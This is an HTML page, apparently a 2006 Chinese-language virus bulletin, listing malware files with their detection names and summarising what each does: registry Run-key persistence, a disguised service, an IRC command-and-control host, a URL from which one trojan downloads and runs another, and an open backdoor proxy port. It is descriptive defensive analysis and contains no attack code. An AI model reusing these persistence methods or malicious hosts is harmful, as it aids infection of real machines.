<DIV></DIV><SPAN id=L02381DC066127C8A title="" style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 5px; PADDING-BOTTOM: 1px; MARGIN: 6px 0px; BORDER-LEFT: #000000 1pt solid; WIDTH: 100%; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #e1ecf7"><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 540px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 540px" width=540></COLGROUP><br />
<TBODY vAlign=top><br />
<TR style="MIN-HEIGHT: 16px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><SPAN><br />
<TABLE title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 536px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 223px" width=223><br />
<COL style="WIDTH: 313px" width=313></COLGROUP><br />
<TBODY><br />
<TR id=L02381E40684A9ACD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=223><SPAN><SPAN id=L02381E806A82B950 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">explore.exe</SPAN></SPAN></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=313><SPAN><SPAN id=L02381EC06CBAD813 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">Backdoor/Agobot.chw</SPAN></SPAN></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR style="MIN-HEIGHT: 17px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><br />
<DIV><SPAN><SPAN id=L02381F406EF2F756 title="" style="PADDING-RIGHT: 1px; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-WEIGHT: normal; FONT-SIZE: x-small; OVERFLOW-X: hidden; PADDING-BOTTOM: 1px; MARGIN: 1px; VERTICAL-ALIGN: baseline; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; FONT-STYLE: normal; FONT-FAMILY: Arial; HEIGHT: 7px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left; TEXT-DECORATION: none; WORD-WRAP: break-word"><br />
<DIV>1、病毒运行后，将创建下列文件：<BR>%SystemDir%\explore.exe, 111616字节<BR>2、在注册表中添加下列启动项：<BR>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<BR>&#8220;1337 virus&#8221; = explore.exe<BR>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]<BR>&#8220;1337 virus&#8221; = explore.exe<BR>这样，在Windows启动时，病毒就可以自动执行。</DIV><br />
<DIV>3、连接IRC服务器irc.kr3wzb4se.info接收并执行黑客命令。<BR>4、通过多种系统漏洞传播，可造成中毒计算机运行速度下降，局域网拥堵。</DIV><br />
<DIV> </DIV></SPAN></SPAN></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></SPAN><br />
<DIV></DIV><SPAN id=L02384340712B3A99 title="" style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 5px; PADDING-BOTTOM: 1px; MARGIN: 6px 0px; BORDER-LEFT: #000000 1pt solid; WIDTH: 100%; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #e1ecf7"><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 540px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 540px" width=540></COLGROUP><br />
<TBODY vAlign=top><br />
<TR style="MIN-HEIGHT: 16px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><SPAN><br />
<TABLE title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 536px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 223px" width=223><br />
<COL style="WIDTH: 313px" width=313></COLGROUP><br />
<TBODY><br />
<TR id=L023843C073637E5C><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=223><SPAN><SPAN id=L02384400759BC25F title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">guest.exe</SPAN></SPAN></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=313><SPAN><SPAN id=L0238444077D406A2 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">Trojan/Delf.kp</SPAN></SPAN></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR style="MIN-HEIGHT: 17px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><br />
<DIV><SPAN><SPAN id=L023844C07A0C4B65 title="" style="PADDING-RIGHT: 1px; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-WEIGHT: normal; FONT-SIZE: x-small; OVERFLOW-X: hidden; PADDING-BOTTOM: 1px; MARGIN: 1px; VERTICAL-ALIGN: baseline; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; FONT-STYLE: normal; FONT-FAMILY: Arial; HEIGHT: 7px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left; TEXT-DECORATION: none; WORD-WRAP: break-word"><br />
<DIV>1、病毒运行后，将创建下列文件：<BR>%SystemDir%\intasks.exe, 25671字节<BR>%SystemDir%\msinetes.inf, 309字节<BR>%SystemDir%\msinetes.pnf, 3304字节<BR>%SystemDir%\svchest.exe, 15872字节<BR>%SystemDir%\winpub.reg, 540字节<BR></DIV><br />
<DIV>2、在注册表中添加下列启动项：<BR>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<BR>&#8220;MSService&#8221; = svchest.exe<BR>这样，在Windows启动时，svchest.exe就可以自动执行。</DIV><br />
<DIV> </DIV><br />
<DIV>3、建立下面服务：</DIV><br />
<DIV>服务名称：Msisvr</DIV><br />
<DIV>服务描述：管理Internet 信息服务管理以及NetBIOS 名称解析的支持。</DIV><br />
<DIV>服务程序：%SystemDir%\INTasks.exe</DIV><br />
<DIV>这样，在Windows启动时，INTasks.exe就可以自动运行。</DIV><br />
<DIV> </DIV><br />
<DIV>4、svchest.exe运行后，设置IE主页、搜索页地址为<A href="http://xp2006.3322.org">http://xp2006.3322.org</A>；自动打开网页<A href="http://www.71791.com">http://www.71791.com</A>, <A href="http://www.71791.com/news">http://www.71791.com/news</A>, <A href="http://www.71791.com/goodvip">http://www.71791.com/goodvip</A>, <A href="http://www.71791.com/mm">http://www.71791.com/mm</A>；下载并执行<A href="http://xingz.3322.org/images/guest.exe">http://xingz.3322.org/images/guest.exe</A></DIV><br />
<DIV> </DIV><br />
<DIV>5、INTasks.exe运行后，负责恢复1、2、3中的病毒文件、注册表数据和服务信息。</DIV><br />
<DIV> </DIV></SPAN></SPAN></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></SPAN><br />
<DIV></DIV><SPAN id=L023850607C449BC8 title="" style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 5px; PADDING-BOTTOM: 1px; MARGIN: 6px 0px; BORDER-LEFT: #000000 1pt solid; WIDTH: 100%; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #e1ecf7"><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 540px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 540px" width=540></COLGROUP><br />
<TBODY vAlign=top><br />
<TR style="MIN-HEIGHT: 16px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><SPAN><br />
<TABLE title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 536px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 223px" width=223><br />
<COL style="WIDTH: 313px" width=313></COLGROUP><br />
<TBODY><br />
<TR id=L023850E07E7CECAB><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=223><SPAN><SPAN id=L0238512080B53DCE title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">phost.exe</SPAN></SPAN></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=313><SPAN><SPAN id=L0238516082ED8F31 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">TrojanProxy.Ranky.dn</SPAN></SPAN></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR style="MIN-HEIGHT: 17px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><br />
<DIV><SPAN><SPAN id=L023851E08525E114 title="" style="PADDING-RIGHT: 1px; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-WEIGHT: normal; FONT-SIZE: x-small; OVERFLOW-X: hidden; PADDING-BOTTOM: 1px; MARGIN: 1px; VERTICAL-ALIGN: baseline; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; FONT-STYLE: normal; FONT-FAMILY: Arial; HEIGHT: 7px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left; TEXT-DECORATION: none; WORD-WRAP: break-word"><br />
<DIV>木马代理，大小176K，经Asprotect加壳处理。</DIV><br />
<DIV>1、病毒运行后，在注册表中添加下列启动项：<BR>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<BR>&#8220;syshost.exe&#8221; = phost.exe<BR>这样，在Windows启动时，病毒就可以自动执行。<BR>2、开启后门代理端口，可供黑客远程使用，成为黑客进行黑客活动的跳板。<BR></DIV></SPAN></SPAN></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></SPAN><br />
<DIV></DIV><SPAN id=L02385420875E3537 title="" style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 5px; PADDING-BOTTOM: 1px; MARGIN: 6px 0px; BORDER-LEFT: #000000 1pt solid; WIDTH: 100%; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #e1ecf7"><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 540px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 540px" width=540></COLGROUP><br />
<TBODY vAlign=top><br />
<TR style="MIN-HEIGHT: 16px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><SPAN><br />
<TABLE title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 536px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 223px" width=223><br />
<COL style="WIDTH: 313px" width=313></COLGROUP><br />
<TBODY><br />
<TR id=L023854A0899689DA><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=223><SPAN><SPAN id=L023854E08BCEDEBD title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">lup.exe</SPAN></SPAN></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=313><SPAN><SPAN id=L023855208E0733E0 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">Backdoor.Agobot</SPAN></SPAN></TD></TR><br />
<TR id=L02385560903F8943><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=223><SPAN><SPAN id=L023855A09277DEE6 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">mssvcc.exe</SPAN></SPAN></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=313><SPAN><SPAN id=L023855E094B034C9 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">Backdoor.Agobot</SPAN></SPAN></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR style="MIN-HEIGHT: 17px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><br />
<DIV><SPAN><SPAN id=L0238566096E88B2C title="" style="PADDING-RIGHT: 1px; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-WEIGHT: normal; FONT-SIZE: x-small; OVERFLOW-X: hidden; PADDING-BOTTOM: 1px; MARGIN: 1px; VERTICAL-ALIGN: baseline; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; FONT-STYLE: normal; FONT-FAMILY: Arial; HEIGHT: 7px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left; TEXT-DECORATION: none; WORD-WRAP: break-word"><br />
<DIV>高波病毒的变种，详细分析报告请参考“<A href="http://blog.donews.com/daishuo/archive/2006/03/14/768215.aspx">昨日病毒(2006.03.13)</A>”中关于lup.exe/mssvcc.exe早先变种的报告。</DIV><br />
<DIV> </DIV></SPAN></SPAN></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></SPAN><br />
<DIV></DIV><SPAN id=L023858009920E32F title="" style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 5px; PADDING-BOTTOM: 1px; MARGIN: 6px 0px; BORDER-LEFT: #000000 1pt solid; WIDTH: 100%; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #e1ecf7"><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 540px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 540px" width=540></COLGROUP><br />
<TBODY vAlign=top><br />
<TR style="MIN-HEIGHT: 16px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><SPAN><br />
<TABLE title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 536px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 223px" width=223><br />
<COL style="WIDTH: 313px" width=313></COLGROUP><br />
<TBODY><br />
<TR id=L023858809B593BB2><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=223><SPAN><SPAN id=L023858C09D919475 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">newname8.exe</SPAN></SPAN></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=313><SPAN><SPAN id=L023859009FC9ED78 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">TrojanDownloader.VB.jr</SPAN></SPAN></TD></TR><br />
<TR id=L02385940A20246BB><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=223><SPAN><SPAN id=L02385980A43AA03E title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">mousepad8.exe</SPAN></SPAN></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=313><SPAN><SPAN id=L023859C0A672FA01 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">TrojanClicker.Small.gdh</SPAN></SPAN></TD></TR><br />
<TR id=L02385A00A8AB5404><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=223><SPAN><SPAN id=L02385A40AAE3AE47 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">keyboard8.exe</SPAN></SPAN></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=313><SPAN><SPAN id=L02385A80AD1C08CA title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">TrojanDownloader.VB.jq</SPAN></SPAN></TD></TR></TBODY></TABLE></SPAN><br 